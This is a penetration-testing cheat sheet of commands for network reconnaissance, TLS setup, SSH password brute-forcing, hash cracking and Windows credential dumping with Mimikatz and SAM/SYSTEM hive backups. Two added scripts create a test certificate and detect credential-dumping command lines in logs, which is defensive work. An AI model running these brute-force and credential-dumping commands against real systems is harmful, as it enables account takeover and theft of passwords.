Basic Linux Networking Tools
Show IP configuration:
# ip a
Change IP/MAC address:
# ip link set dev eth0 down
# macchanger -m 23:05:13:37:42:21 eth0
# ip link set dev eth0 up
Static IP address configuration:
# ip addr add 10.5.23.42/24 dev eth0
DNS lookup:
# dig compass-security.com
Reverse DNS lookup:
# dig -x 10.5.23.42
Information Gathering
Find owner/contact of domain or IP address:
# whois compass-security.com
Get nameservers and test for DNS zone transfer:
# dig example.com ns
# dig example.com axfr @n1.example.com
Get hostnames from CT logs: search for %.compass-security.com on https://crt.sh.
Or using an nmap script:
# nmap -sn -Pn compass-security.com --script hostmap-crtsh
TLS Tools
Create self-signed certificate:
# openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -nodes -subj "/CN=example.org/"
Start TLS Server:
# ncat --ssl -l -p 1337 --ssl-cert cert.pem --ssl-key key.pem
Connect to TLS service:
# ncat --ssl 10.5.23.42 1337
Connect to TLS service using openssl:
# openssl s_client -connect 10.5.23.42:1337
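Added example, not part of the cheat sheet: a small sh script that creates the self-signed certificate with the openssl command above and then checks what was produced before the files are handed to ncat or s_client. It assumes the openssl CLI is installed and writes into a temporary directory (the directory name and the function names are this example's own choices). The checks cover the three things that usually go wrong in practice: the subject not being what was intended, the key not belonging to the certificate, and the client having nothing to pin against.

```shell
#!/bin/sh
# Self-signed certificate for a test TLS server, plus sanity checks.
# Assumes: openssl CLI available. Files go to a temp dir chosen here.
WORKDIR=$(mktemp -d)

# make_cert: the cheat sheet's openssl req invocation, with a short validity
# (-days 30) so a test certificate does not outlive its purpose.
make_cert() {
    openssl req -x509 -newkey rsa:2048 \
        -keyout "$WORKDIR/key.pem" -out "$WORKDIR/cert.pem" \
        -nodes -days 30 -subj "/CN=example.org/" 2>/dev/null
}

# cert_subject: confirm -subj was applied (expect a CN of example.org).
cert_subject() {
    openssl x509 -in "$WORKDIR/cert.pem" -noout -subject
}

# cert_fingerprint: SHA-256 fingerprint to pin on the client side.
# ncat has no pinning option; compare it against the certificate that
# "openssl s_client -showcerts" prints for the server you connect to.
cert_fingerprint() {
    openssl x509 -in "$WORKDIR/cert.pem" -noout -fingerprint -sha256
}

# key_matches_cert: exit 0 only when the public key derived from key.pem
# equals the public key embedded in cert.pem (a mismatched pair makes
# ncat/s_server fail at startup, or worse, serve the wrong identity).
key_matches_cert() {
    [ "$(openssl pkey -in "$WORKDIR/key.pem" -pubout 2>/dev/null)" = \
      "$(openssl x509 -in "$WORKDIR/cert.pem" -noout -pubkey)" ]
}

make_cert
cert_subject
cert_fingerprint
key_matches_cert && echo "key.pem matches cert.pem in $WORKDIR"
```

The private key is written unencrypted because of -nodes; delete the temporary directory once the test server is done with it.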
Cracking
Try SSH passwords from a wordlist:
# ncrack -p 22 --user root -P ./passwords.txt 10.5.23.0/24
Determine hash type:
# hashid 869d[…]bd88
Show example hash types for hashcat:
# hashcat --example-hashes
Crack hashes (e.g. 5600 for NetNTLMv2 type):
# hashcat -m 5600 -a 0 hash.txt /path/to/wordlists/*
Crack hashes using John the Ripper:
# john hashes.txt
Windows Credentials Gathering
Start Mimikatz and create log file:
C:\>mimikatz.exe
# privilege::debug
# log C:\tmp\mimikatz.log
Read an lsass.exe process dump (create the dump first with Task Manager or procdump):
# sekurlsa::minidump lsass.dmp
Show passwords/hashes of logged in users:
# sekurlsa::logonpasswords
Backup SYSTEM & SAM hive:
C:\>reg save HKLM\SYSTEM system.hiv
C:\>reg save HKLM\SAM sam.hiv
Extract hashes using Mimikatz:
# lsadump::sam /system:system.hiv /sam:sam.hiv
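Added example, not part of the cheat sheet: the commands in this section leave distinctive traces in process-creation telemetry (Sysmon Event ID 1, Windows Security event 4688). The sh script below runs a grep-based detector over a constructed sample of such records, reduced to one line each; the record format, the host and user names, and the function names are this example's own assumptions, not real log output.

```shell
#!/bin/sh
# Flag credential-dumping command lines from process-creation logs.
# SAMPLE_LOG is constructed for this example; real telemetry (Sysmon
# Event ID 1, Security 4688) would be exported to a similar one-line form.
SAMPLE_LOG='2024-01-01T10:00:01 host1 user=alice cmd="notepad.exe C:\notes.txt"
2024-01-01T10:00:05 host1 user=bob cmd="reg save HKLM\SAM sam.hiv"
2024-01-01T10:00:06 host1 user=bob cmd="reg save HKLM\SYSTEM system.hiv"
2024-01-01T10:01:10 host2 user=svc cmd="procdump.exe -ma lsass.exe lsass.dmp"
2024-01-01T10:02:00 host2 user=svc cmd="mimikatz.exe sekurlsa::logonpasswords"
2024-01-01T10:03:00 host3 user=carol cmd="reg query HKLM\SOFTWARE\Microsoft"
2024-01-01T10:04:00 host2 user=svc cmd="mimikatz.exe lsadump::sam /system:system.hiv /sam:sam.hiv"'

# Indicators taken from the commands listed above: hive backups of SAM/SYSTEM,
# a procdump of lsass, and the mimikatz sekurlsa/lsadump modules.
# In ERE, \\ matches one literal backslash.
PATTERN='reg save HKLM\\(SAM|SYSTEM)|procdump.*lsass|sekurlsa::|lsadump::'

# flag_cred_access: filter stdin to the matching records (case-insensitive).
flag_cred_access() {
    grep -iE "$PATTERN"
}

# count_hits: number of flagged records in the constructed sample.
count_hits() {
    printf '%s\n' "$SAMPLE_LOG" | flag_cred_access | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_LOG" | flag_cred_access
echo "flagged records: $(count_hits)"
```

Run it against a real export with `flag_cred_access < proc_events.log`; "reg query" is deliberately not matched, since only "reg save" of SAM or SYSTEM is the indicator, and the lsass pattern is restricted to procdump so that ordinary lsass.exe process starts are not flagged.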
Active Directory
Use SharpHound to gather information and import it into BloodHound for analysis.
Download PingCastle from pingcastle.com and generate a report.